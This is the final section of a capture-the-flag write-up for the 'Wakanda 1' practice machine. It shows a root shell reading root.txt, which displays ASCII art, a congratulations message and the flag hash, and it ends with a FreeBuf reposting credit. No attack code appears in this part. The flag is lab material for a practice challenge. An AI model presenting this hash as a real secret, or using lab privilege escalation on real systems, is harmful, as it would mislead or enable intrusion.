root@Wakanda1:/tmp/pip-G7z4Td-build#
7. The final flag
root@Wakanda1:/tmp/pip-G7z4Td-build# cd
root@Wakanda1:~# ls -la
total 20
drwx------  2 root root 4096 Aug  5 02:26 .
drwxr-xr-x 22 root root 4096 Aug  1 13:05 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r-----  1 root root  429 Aug  1 15:16 root.txt
root@Wakanda1:~# cat root.txt
        __.--.____.--._
       ( )=.-":;:;:;;':;:;:;"-._
        \\\:;:;:;:;:;;:;::;:;:;:\
         \\\:;:;:;:;:;;:;:;:;:;:;\
          \\\:;::;:;:;:;:;::;:;:;:\
           \\\:;:;:;:;:;;:;::;:;:;:\
            \\\:;::;:;:;:;:;::;:;:;:\
             \\\;;:;:_:--:_:_:--:_;:;\
              \\\_.-""-._\
               \\
                \\
                 \\
                  \\ Wakanda 1 - by @xMagass
                   \\
                    \\

Congratulations You are Root!

821ae63dbe0c573eff8b69d451fb21bc
* Author: laffray. Please credit FreeBuf.COM when reposting.